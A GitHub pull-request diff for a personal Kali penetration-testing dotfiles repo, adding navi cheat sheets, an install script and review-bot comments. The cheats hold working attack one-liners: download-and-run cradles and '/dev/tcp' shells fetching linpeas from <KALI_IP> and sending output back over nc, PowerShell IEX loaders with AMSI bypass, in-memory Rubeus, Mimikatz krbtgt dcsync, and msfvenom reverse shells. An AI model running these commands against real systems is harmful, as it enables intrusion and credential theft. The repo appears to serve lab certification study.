Work #18

Open
wants to merge 93 commits into base: main

93 commits
ec6e101
initial personalised tweaks
thamyekh Jan 6, 2023
8e7c059
changed i3 repo; minor fixes
thamyekh Jan 8, 2023
342278f
moved packages into text files
thamyekh Jan 9, 2023
48993ef
changed firefox to firefox-esr
thamyekh Jan 9, 2023
9af7c3b
fixed audio; added script for vmware instance
thamyekh Jan 9, 2023
17b6ef8
start i3 on login; neovim as default editor
thamyekh Jan 9, 2023
581ea31
added todo and tools
thamyekh Jan 9, 2023
f05ef2b
tools added; refactoring
thamyekh Jan 12, 2023
3eba573
added -Pn flag
thamyekh Jan 12, 2023
1a80ebe
alacritty to terminator; added tools & cheatsheets
thamyekh Jan 20, 2023
954be1f
fixed terminator config
thamyekh Jan 31, 2023
3ee3a6b
lockscreen and ffprofile
thamyekh Feb 6, 2023
567ac9f
tun0 IP to clipboard on click; refactor i3blocks.conf
thamyekh Feb 7, 2023
2638dbc
change weather location for i3blocks
thamyekh Feb 7, 2023
aaed5fa
removed wallpapers in favour of solid color 808080
thamyekh Mar 13, 2023
0a835be
python utils and README todos
thamyekh Apr 2, 2023
ef043ff
Merge pull request #1 from thamyekh/work
thamyekh Apr 2, 2023
4757b02
added cheatsheets
thamyekh Jun 15, 2023
1b4a5c5
Merge pull request #2 from thamyekh/feature-home
thamyekh Jun 15, 2023
dce352f
minor changes
thamyekh Jun 15, 2023
82f2cf9
Merge branch 'main' into work
thamyekh Jun 15, 2023
9b598b7
Merge pull request #3 from thamyekh/work
thamyekh Jun 15, 2023
ffeaf3d
added pivoting cheatsheets
thamyekh Jun 18, 2023
f9e9c71
Merge branch 'main' into home
thamyekh Jun 18, 2023
f4134d3
Merge pull request #4 from thamyekh/home
thamyekh Jun 18, 2023
77dad87
added seatbelt cheatsheet
thamyekh Jul 3, 2023
0198b6a
Merge pull request #5 from thamyekh/work
thamyekh Jul 5, 2023
1a00a92
worked on OSEP and todos; added gedit
thamyekh Jul 5, 2023
eb55201
Merge pull request #6 from thamyekh/work
thamyekh Jul 5, 2023
98431f8
updated navi cheatsheets
thamyekh Jul 10, 2023
74af056
minor changes
thamyekh Jul 10, 2023
30c0527
updated todos
thamyekh Jul 12, 2023
743a1e7
Merge pull request #7 from thamyekh/work
thamyekh Jul 17, 2023
e9fa360
Merge branch 'main' into home
thamyekh Jul 17, 2023
04c2c1c
Merge pull request #8 from thamyekh/home
thamyekh Jul 17, 2023
32a77a5
added VM build instructions for Windows hosts
thamyekh Jul 18, 2023
931c86e
updated cheatsheets
thamyekh Jul 20, 2023
afa9a65
updated for testing
thamyekh Jul 27, 2023
e8e691f
Merge pull request #9 from thamyekh/home
thamyekh Jul 27, 2023
02ad518
Merge pull request #10 from thamyekh/home
thamyekh Jul 27, 2023
1280f18
apache opt test + cheatsheet
thamyekh Dec 5, 2023
a04716f
Merge branch 'main' into work
thamyekh Dec 5, 2023
b6eba04
Merge pull request #11 from thamyekh/work
thamyekh Dec 5, 2023
abfbd0f
cheats and tools
thamyekh Dec 6, 2023
2665368
Merge pull request #12 from thamyekh/work
thamyekh Dec 6, 2023
76010fa
refactor and fixed apache symlink
thamyekh Dec 6, 2023
9010817
Merge pull request #13 from thamyekh/work
thamyekh Dec 6, 2023
30c3ed9
removed i3 click to get tun0 ip
thamyekh Dec 7, 2023
3f0ed19
Merge pull request #14 from thamyekh/work
thamyekh Dec 7, 2023
fa087b4
minor fixes
thamyekh Dec 8, 2023
839b19b
Merge pull request #15 from thamyekh/work
thamyekh Dec 8, 2023
5bf61ae
fixed cheatsheets added adPEAS
thamyekh Dec 11, 2023
8693546
Merge pull request #16 from thamyekh/work
thamyekh Dec 11, 2023
428b54d
major fixes
thamyekh Dec 12, 2023
0be6492
Merge pull request #17 from thamyekh/work
thamyekh Dec 12, 2023
22c1f56
minor fixes
thamyekh Dec 19, 2023
a0af2a0
Merge pull request #18 from thamyekh/work
thamyekh Dec 19, 2023
c3cf8de
added conky, tidying
thamyekh Dec 21, 2023
b6c8dac
Merge pull request #19 from thamyekh/work
thamyekh Dec 21, 2023
d706a18
conky fixes, more cheats
thamyekh Jan 5, 2024
567c803
test install command
thamyekh Jan 5, 2024
1a1d573
Merge pull request #20 from thamyekh/work
thamyekh Jan 5, 2024
d5a5cf7
minor fixes
thamyekh Jan 8, 2024
da58a44
Merge pull request #21 from thamyekh/work
thamyekh Jan 8, 2024
a5e41c6
refactored cheatsheets
thamyekh Jan 9, 2024
bd1bcb7
Merge pull request #22 from thamyekh/work
thamyekh Jan 9, 2024
7773df2
refactored cheatsheets
thamyekh Jan 10, 2024
893428e
Merge pull request #23 from thamyekh/work
thamyekh Jan 10, 2024
c3a087d
minor fixes
thamyekh Jan 11, 2024
b351a0e
Merge pull request #24 from thamyekh/work
thamyekh Jan 12, 2024
799e019
minor fixes
thamyekh Feb 1, 2024
4770f34
Merge pull request #25 from thamyekh/work
thamyekh Feb 1, 2024
62fbdd6
cheatsheets
thamyekh Feb 5, 2024
9061123
updated cheatsheets
thamyekh Feb 28, 2024
78f09c1
Merge pull request #26 from thamyekh/work
thamyekh Feb 28, 2024
1c8772f
updated cheatsheets
thamyekh Mar 25, 2024
0455ea3
Merge pull request #27 from thamyekh/work
thamyekh Mar 25, 2024
5c21817
updated cheatsheets
thamyekh Mar 28, 2024
4ac6123
Merge pull request #28 from thamyekh/work
thamyekh Mar 28, 2024
048216f
updated cheatsheets
thamyekh Apr 6, 2024
bfb5e2b
updated cheatsheets
thamyekh Apr 7, 2024
70593b4
Merge pull request #29 from thamyekh/work
thamyekh Apr 7, 2024
2b2b04e
updated cheatsheets
thamyekh Apr 24, 2024
814e5ee
Merge pull request #30 from thamyekh/work
thamyekh Apr 24, 2024
5c82cd2
updated cheatsheets
Apr 25, 2024
acbede8
fixed neovim, rust install, added useful linux commands
thamyekh Apr 28, 2024
8124dd3
added images
thamyekh Apr 28, 2024
183a5ba
updated cheatsheets; added optional dnsmasq
May 30, 2024
116042d
refactored pipewire
thamyekh May 31, 2024
fae28e0
refactor crackmapexec
thamyekh Jun 6, 2024
612f21c
debloat
thamyekh Jun 11, 2024
6296ec2
fixed apt installing missing packages
thamyekh Jun 12, 2024
d490a9e
minor fixes
thamyekh Jun 13, 2024
20 changes: 20 additions & 0 deletions .local/share/navi/cheats/enumeration.cheat
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
% enumeration

# download + execute winPEASany from memory in PowerShell
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "$url" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("<OPTIONAL_PARAM>")

# fileless execution of linpeas
sudo python3 -m http.server 80
curl <KALI_IP>/linpeas.sh | sh #Victim

# fileless execution of linpeas
sudo nc -q 5 -lvnp 80 < linpeas.sh
cat < /dev/tcp/<KALI_IP>/80 | sh #Victim

# excute from memory and send output back to the host
sudo python3 -m http.server 80
nc -lvnp 9002 | tee linpeas.out
curl <KALI_IP>/linpeas.sh | sh | nc <KALI_IP> 9002 #Victim

#read linpeas output with colors
less -r linpeas.out
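Review bot: the two `# fileless execution of linpeas` entries (the `python3 -m http.server` variant and the `nc -q 5 -lvnp 80` variant) carry an identical description, so navi presents two indistinguishable choices; give the second a distinct description such as `# fileless execution of linpeas (netcat listener)`. Also `# excute from memory and send output back to the host` has a typo (`execute`), and the trailing `#Victim` markers appended to command lines are inconsistent with template.cheat, which reserves `;` lines for metacomments; a `; run on victim` line above the command keeps the convention and keeps the marker out of the executed string.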
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/impacket.cheat
Expand Up @@ -8,3 +8,10 @@ impacket-smbserver -smb2support evil $PWD

# smbserver (password share on kali)
impacket-smbserver -smb2support -username evil -password evil evil $PWD

# raiseChild
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>
impacket-raiseChild -hashes <LMHASH>:<NTHASH> <CHILD_DOMAIN>/<ADMIN_USER>:'<PASS>'

# psexec via env KRB5CCNAME (testing needed remove dc-ip and target-ip)
impacket-psexec -k -no-pass <DOMAIN>/<ADMIN>@<ETC_HOST_FQDN> -dc-ip 192.168.178.70 -target-ip 192.168.178.70
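Review bot: the `# psexec via env KRB5CCNAME` entry hardcodes the lab address `192.168.178.70` for both `-dc-ip` and `-target-ip`, while every other entry in this file uses placeholders such as `<DOMAIN>` and `<ADMIN_USER>`; replace the literal with placeholders so the cheat does not leak a private lab address and stays reusable. The `(testing needed remove dc-ip and target-ip)` remark belongs in a `;` metacomment or the README todo list rather than in the description, which navi shows as the one-line summary of the command.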
6 changes: 6 additions & 0 deletions .local/share/navi/cheats/mimikatz.cheat
@@ -0,0 +1,6 @@
% mimikatz

# invoke-mimikatz single command with spaces
IEX(New-Object Net.WebClient).DownloadString("http://<KALI_IP>/win/Invoke-Mimikatz2.ps1")
; example: dcsync
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<FQDN> /user<DOMAIN>:\krbtgt"'
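Review bot: in `Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<FQDN> /user<DOMAIN>:\krbtgt"'` the colon is misplaced; mimikatz parses arguments as `/name:value`, so as written it reads the argument name as `user<DOMAIN>` rather than `user`. The colon should follow `/user` directly, matching the `/domain:<FQDN>` form on the same line. The `; example: dcsync` metacomment also sits between two command lines under a single `# invoke-mimikatz single command with spaces` description, so navi treats the download line and the example as one block; giving the example its own `#` description lets the two be selected separately.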
24 changes: 24 additions & 0 deletions .local/share/navi/cheats/msfconsole.cheat
@@ -0,0 +1,24 @@
% msfconsole

# listener handler
msfconsole -q -x "use multi/handler; set payload <PAYLOAD>; set lhost <LHOST>; set lport <PORT>; exploit"

# meterpreter pivoting
use multi/manage/autoroute
set session <SESSION>
exploit
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
exploit -j

# port scan via pivot
use auxiliary/scanner/portscan/tcp
set RHOST <TARGET_IP>

# duplicate meterpreter session start background multi/handler first
use post/windows/manage/multi_meterpreter_inject
set iplist <VICTIM_IP>
set lport 443
set payload <PAYLOAD>
set session <SESSION>
exploit
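Review bot: the `# port scan via pivot` entry sets `RHOST` but never issues `run`, and the `auxiliary/scanner/portscan/tcp` module's option is `RHOSTS` (plural), so the two lines as written configure nothing usable; fix the option name and add the `run` line, as the other entries in this file do. The `# listener handler` one-liner is also duplicated verbatim in msfvenom.cheat; keeping it in one file avoids the two copies drifting apart.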
9 changes: 6 additions & 3 deletions .local/share/navi/cheats/msfvenom.cheat
Expand Up @@ -6,10 +6,13 @@ msfvenom -p java/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f war -o shell.w
# windows 64 reverse powershell
msfvenom -p windows/x64/powershell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -a x64 --platform windows -b '\x00' -e x64\xor_dynamic -o shell.exe

# windows 64 meterpreter https
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=tun0 LPORT=443 EXITFUNC=thread -f exe -o met.exe

# linux 64 meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=443 -f elf prependfork=true -t 300 -e x64/xor_dynamic -o shellme.elf

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'

# search payloads
msfvenom --list payloads | grep linux | grep meterpreter | grep x64

# listener handler
msfconsole -q -x "use multi/handler; set payload <PAYLOAD>; set lhost <LHOST>; set lport <PORT>; exploit"
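Review bot: `-e x64\xor_dynamic` on the `# windows 64 reverse powershell` line uses a backslash; in an unquoted POSIX shell word `\x` becomes `x`, so msfvenom receives the encoder name `x64xor_dynamic`, which does not exist. The `# linux 64 meterpreter` entry below spells it `x64/xor_dynamic`, which is the correct form. The `# listener handler` entry at the end repeats the identical command already in msfconsole.cheat and should live in only one of the two files.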
13 changes: 11 additions & 2 deletions .local/share/navi/cheats/powershell.cheat
@@ -1,4 +1,13 @@
% powershell/misc

# powershell base64 encode command string
[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("'mikefrobbins.com'"))
# base64 encode command string
$text = "(New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/run.txt') | IEX"
[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes($text))
powershell -enc KABOAGUA...==

# fileless import/execute (bypass amsi first)
IEX(New-Object Net.WebClient).DownloadString("http://<KALI_IP>/<PS1>")
powershell -ep bypass -command "iex(New-Object Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>')"
echo IEX (New-Object Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>') | powershell -NoProfile -Command -
(New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/<PS1>') | IEX
powershell -ExecutionPolicy Bypass -Command "[scriptblock]::Create((Invoke-WebRequest 'http://<KALI_IP>/<PS1>').Content).Invoke();"
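Review bot: `# powershell base64 encode command string` and `# base64 encode command string` describe the same operation, and the first encodes the sample string `'mikefrobbins.com'`, which reads as a leftover from a blog example rather than a usable cheat; keep only the second entry. Under `# fileless import/execute (bypass amsi first)` five alternative one-liners sit beneath a single description, so navi presents them as one multi-line block rather than five selectable variants; give each its own `#` line (for example `# fileless import/execute via IEX` and `# fileless import/execute via scriptblock`). The `powershell -enc KABOAGUA...==` line is an elided sample and would be clearer as a `;` metacomment than as a command.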
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/rubeus.cheat
@@ -0,0 +1,7 @@
% rubeus

# running in memory
[Convert]::ToBase64String([IO.File]::ReadAllBytes("/opt/win/Rubeus.exe")) | Out-File -Encoding ASCII /opt/win/rubeus.txt
$content = (New-Object System.Net.WebClient).DownloadString('http://<KALI_IP>/win/rubeus.txt')
$RubeusAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($content))
[Rubeus.Program]::Main("<RUBEUS_CMD>".Split())
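Review bot: the first line under `# running in memory` (`[Convert]::ToBase64String([IO.File]::ReadAllBytes("/opt/win/Rubeus.exe")) | Out-File ... /opt/win/rubeus.txt`) is a preparation step on the Kali host, while the remaining three lines run in the target's PowerShell session; install.sh fetches `Rubeus.exe` into `/opt/win` but never produces `rubeus.txt`, so the cheat silently depends on that manual step. Split the host-side line into its own `#` entry so the two halves are not pasted into one session by mistake, and note in the description which side each runs on.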
4 changes: 4 additions & 0 deletions .local/share/navi/cheats/smb.cheat
Expand Up @@ -7,4 +7,8 @@ smbclient -L //<RHOST> -U ''
net use z: \\\<LHOST>\evil /user:evil evil
dir Z:\

# execute files directly from smb
net use \\<LHOST>\share /user:<USER> <PASS>
\\<LHOST>\share\OSEP-Code-Snippets\<ATTACK_TYPE>\bin\x64\Release\<BIN>

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
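Review bot: `# execute files directly from smb` mounts `\\<LHOST>\share` with `<USER>`/`<PASS>`, but the only server this repo defines is `impacket-smbserver -smb2support -username evil -password evil evil $PWD` in impacket.cheat, which exposes a share named `evil`, and the context line just above uses `\\\<LHOST>\evil /user:evil evil`; align the share name and credentials across the two files, or define them as navi variables in the style of the `$ LHOST:` line at the bottom of this file. That context line `net use z: \\\<LHOST>\evil` also carries three leading backslashes, one more than a UNC path takes.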
7 changes: 7 additions & 0 deletions .local/share/navi/cheats/template.cheat
@@ -0,0 +1,7 @@
% start tags

# should be descriptions of commands
; are ignored. You can use them for metacomments
navi --print

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
63 changes: 33 additions & 30 deletions install.sh
Expand Up @@ -21,40 +21,43 @@ betterlockscreen -u . --fx color --color 808080

# rust tools install
cargo install rustscan navi

# github tools install
sudo curl -sL https://api.github.com/repos/carlospolop/PEASS-ng/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee git_peass
sudo mkdir -p /opt/peass && sudo wget -i git_peass -P /opt/peass
sudo wget https://raw.githubusercontent.com/itm4n/PrivescCheck/master/PrivescCheck.ps1 -P /opt/peass
sudo curl -sL https://api.github.com/repos/DominicBreuker/pspy/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee git_pspy
sudo mkdir -p /opt/pspy && sudo wget -i git_pspy -P /opt/pspy
sudo curl -sL https://api.github.com/repos/jpillora/chisel/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | grep -v darwin | sudo tee git_chisel
sudo mkdir -p /opt/lateral && sudo wget -i git_chisel -P /opt/lateral
sudo rm git_peass git_pspy git_chisel
sudo mkdir -p /opt/webshells
sudo git clone https://github.com/ivan-sincek/php-reverse-shell.git /opt/webshells/php-reverse-shell
sudo mkdir -p /opt/webshells/p0wny-shell
sudo wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -P /opt/webshells/p0wny-shell
sudo mkdir -p /opt/win_binaries
sudo wget https://gitlab.com/kalilinux/packages/windows-binaries/-/raw/kali/master/nc.exe -P /opt/win_binaries
sudo wget https://live.sysinternals.com/PsExec.exe -P /opt/win_binaries
sudo wget https://live.sysinternals.com/PsExec64.exe -P /opt/win_binaries
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -P /opt/win_binaries
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -P /opt/win_binaries
sudo wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.7z -P /opt/win_binaries
sudo mkdir /opt/lin_binaries
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep nmap | head -n 1)
sudo wget $(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | grep tar) -P /opt/lin_binaries
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep socat | head -n 1)
sudo wget $(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64) -P /opt/lin_binaries

# python tools install

pip3 install bloodhound

# ruby tools install
sudo gem install evil-winrm

# wget tools install into /opt
sudo mkdir -p /opt/lin /opt/web /opt/win
sudo curl -sL https://api.github.com/repos/jpillora/chisel/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | grep -v darwin | sudo tee /tmp/git_download
sudo curl -sL https://api.github.com/repos/projectdiscovery/naabu/releases/latest | jq -r ".assets[].browser_download_url" | grep -e 386 -e amd64 | sudo tee -a /tmp/git_download
sudo cat /tmp/git_download | grep linux | sudo tee /tmp/git_download_lin
sudo cat /tmp/git_download | grep windows | sudo tee /tmp/git_download_win
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep nmap | head -n 1)
sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | grep tar | sudo tee -a /tmp/git_download_lin
elf=$(sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases | jq -r ".[].tag_name" | grep socat | head -n 1)
sudo curl -sL https://api.github.com/repos/ernw/static-toolbox/releases/tags/$elf | jq -r ".assets[].browser_download_url" | grep _64 | sudo tee -a /tmp/git_download_lin
sudo wget -i /tmp/git_chisel_lin -P /opt/lin
sudo wget -i /tmp/git_chisel_win -P /opt/win
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh -P /opt/lin
sudo curl -sL https://api.github.com/repos/DominicBreuker/pspy/releases/latest | jq -r ".assets[].browser_download_url" | sudo tee /tmp/git_pspy
sudo mkdir -p /opt/lin/pspy && sudo wget -i /tmp/git_pspy -P /opt/lin/pspy
sudo git clone https://github.com/ivan-sincek/php-reverse-shell.git /opt/web/php-reverse-shell
sudo wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -P /opt/web/p0wny-shell
sudo wget https://raw.githubusercontent.com/z3mms/HostRecon/master/HostRecon.ps1 -P /opt/win
sudo wget https://raw.githubusercontent.com/thamyekh/OSEP-Code-Snippets/main/active_directory/Invoke-Mimikatz2.ps1 -P /opt/win
sudo wget https://gitlab.com/kalilinux/packages/windows-binaries/-/raw/kali/master/nc.exe -P /opt/win
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe -P /opt/win
sudo wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe -P /opt/win
sudo wget https://live.sysinternals.com/PsExec.exe -P /opt/win
sudo wget https://live.sysinternals.com/PsExec64.exe -P /opt/win
sudo wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_Any/Rubeus.exe -P /opt/win
sudo wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe -P /opt/win
sudo ln -s /opt/lin /var/www/html/lin
sudo ln -s /opt/web /var/www/html/web
sudo ln -s /opt/win /var/www/html/win
# TODO: remove this line after checking nabuu linwinpeas chisel p0wnyshell php nmap socat rubeus are installed


# nerdfonts install/reboot
mkdir -p ~/.local/share/fonts/
sudo curl -sL https://api.github.com/repos/ryanoasis/nerd-fonts/releases/latest | jq -r ".assets[] | select(.name | test(\"Iosevka\")) | .browser_download_url" > iosevka
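Review bot: the download lists are written to `/tmp/git_download_lin` and `/tmp/git_download_win`, but the two `wget -i` lines that follow read `/tmp/git_chisel_lin` and `/tmp/git_chisel_win`, which nothing creates, so chisel, naabu and the static nmap and socat builds are never fetched; point `sudo wget -i /tmp/git_chisel_lin -P /opt/lin` and `sudo wget -i /tmp/git_chisel_win -P /opt/win` at the `git_download_*` files (the `# TODO: remove this line after checking nabuu ...` comment, which also misspells naabu, suggests this was already suspected). Two further points on the same block: every tool is pulled from the `latest` release via the GitHub API with no version pin or checksum, so the installed set changes silently between runs and there is no way to tell a tampered asset from a legitimate one; and `sudo ln -s /opt/lin /var/www/html/lin` with its `web` and `win` siblings publishes the whole tool directories through Apache's default document root, so any time apache2 is started on this box they are served on every interface. Pinning release tags and recording hashes, and restricting the vhost that exposes these symlinks to the VPN interface, would address both.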
Expand All @@ -73,4 +76,4 @@ fc-cache -fv
sudo apt -y install pipewire-pulse wireplumber pipewire-media-session-
systemctl --user --now enable wireplumber.service

echo "Done! Please reboot: Select i3 on login, run lxappearance and select arc-dark, you can also delete this repo."
echo "Done! After reboot run lxappearance and select arc-dark, you can also delete this repo."